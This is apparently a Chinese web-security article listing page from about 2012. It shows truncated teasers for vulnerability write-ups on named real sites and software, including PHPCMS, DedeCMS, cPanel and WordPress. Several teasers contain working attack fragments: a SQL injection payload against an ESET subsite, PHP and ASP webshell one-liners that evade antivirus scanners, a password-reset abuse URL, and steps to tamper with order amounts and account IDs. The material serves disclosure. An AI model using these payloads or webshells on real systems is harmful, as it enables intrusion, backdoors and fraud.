PHPCMSV9 201212最新注入漏洞分析(已修复) - 网站安全关注热度:21

之前360爆出\phpcms\modules\poster\index.php 文件poster_click函数注入漏洞，其函数功能是统计广告点击次数。相关链接:http://www.2cto.com/Article/201212/178023.html其实在同一个文件，还有一处注入，在..[详情]

3158.cn妹子密码获取漏洞 - 网站安全 - 自学php关注热度:14

写入自己的油箱就能 收到密码 用户名需要猜解或者暴力 这个也不是难题详细说明：http://anhui.3158.cn/RegfindPassword.action?email=邮箱loginName=用户名测试所有分站都有此洞!显示失败其实发送成..[详情]

eset分站登录框注入以及跨站 - 网站安全 - 自学关注热度:10

参数phone过滤不严，造成注入，以及跨站注入以及跨站地址为 http://jf.eset.com.cn/index.php/user/lookpassphone参数在手机号码处sql:#39; and(select 1 from(select count(*),concat((select (select .....[详情]

绕过D盾Web查杀的脚本木马 - 网站安全 - 自学php关注热度:18

过D盾WEB查杀：%ExecuteGlobal(Request(test))%ExecuteGlobal D盾无提示不提示一句话，只提示Execute：%Execute(Request.Form(test))%%Dim oo=Request(test)Execute o%无耻的办法之一（利用了Exe.....[详情]

HTML5安全攻防详析之七：新标签攻击 - 网站安全关注热度:19

HTML5去掉了很多过时的标签，例如center和frameset，同时又引入了许多有趣的新标签，例如video和audio标签可以允许动态的加载音频和视频。 HTML5引入的新标签包括Audio、Video、Canvas、A.....[详情]

HTML5安全风险详析之六：API攻击 - 网站安全 - 自关注热度:21

HTML5里有许多协议、模式和API，可能成为攻击者的攻击途径。 一、registerProtocolHandler：信息泄漏 HTML5允许某些协议和schema注册为新的特性。例如下面的语句可以注册一个email handler。navi..[详情]

发几个过D盾Web查杀/安全狗/护卫神的PHP免杀一句关注热度:15

大家可以看到上图 只是有一部分被杀最典型最原始的一句话 被杀?php @eval($_POST[#39;k8#39;]);?下面几个都是变种 不被杀?php $k=ass.ert; $k(${_PO.ST} [#39;8#39;]);??$_POST[#39;k.....[详情]

Guru Auction 2.0多重sql注射及修复 - 网站安全 - 自学关注热度:11

Guru Auction 2.0 Multiple SQL Injection Vulnerabilities作者 : v3n0m应用 : Guru Auction 2.0Price : $49Vendor : http://www.guruscript.com/Google Dork : inurl:subcat......[详情]

WordPress Asset-Manager PHP文件上传漏洞及修复 - 网站关注热度:8

这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。..[详情]

DedeCMS会员中心书签管理SQL注射漏洞 - 网站安全关注热度:14

DedeCMS会员中心SQL注射漏洞需要magic_quotes_gpc = Off会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.DedeCMS会员中心书签管理SQL注射漏洞成功利用该漏洞可获得管理员密码会员登..[详情]

C-Panel Cross Site Scripting - 网站安全 - 自学php关注热度:16

CPanel Non Persistent XSSDetails=============Product: CpanelSecurity-Risk: HighRemote-Exploit: yesVendor-URL: http://www.cpanel.netAdvisory-Status: NotPublishedCredits=============Discover.....[详情]

逛网站修改任意账号密码 - 网站安全 - 自学php关注热度:15

注册，登陆，找回密码输入新密码截断http的post数据修改userid为其他帐号的userid，直接f12在网站页面就能看到userid提交修改成功，其他帐号的密码被修改了批量修改危害很大，或者直接看..[详情]

苏宁易购会员中心某验证功能权限设计错误致短关注热度:20

苏宁易购会员中心某功能权限无验证，容易造成权限以外的滥用。1.苏宁易购会员中心，有一个手机验证功能。该功能为了方便会员绑定手机。2.手机绑定，需要先通过邮箱认证，该过程..[详情]

珍品网修改订单任意金额支付 - 网站安全 - 自学关注热度:11

珍品网修改订单任意金额支付，该支付接口应该升级过的吧，但还是能改，订单又未加已支付金额项注册下单，支付，选择拉卡拉支付截断http请求，更改post金额数据提交到拉卡拉支付页..[详情]

丁丁地图各种储存XSS - 网站安全 - 自学php关注热度:10

首先，这网站任何分站，基本都没做过滤，还有论坛啊，什么的等等，等等。http://user.ddmap.com/2597861 你访问一下，看个人资料你懂得。----------------------------------------------------------------..[详情]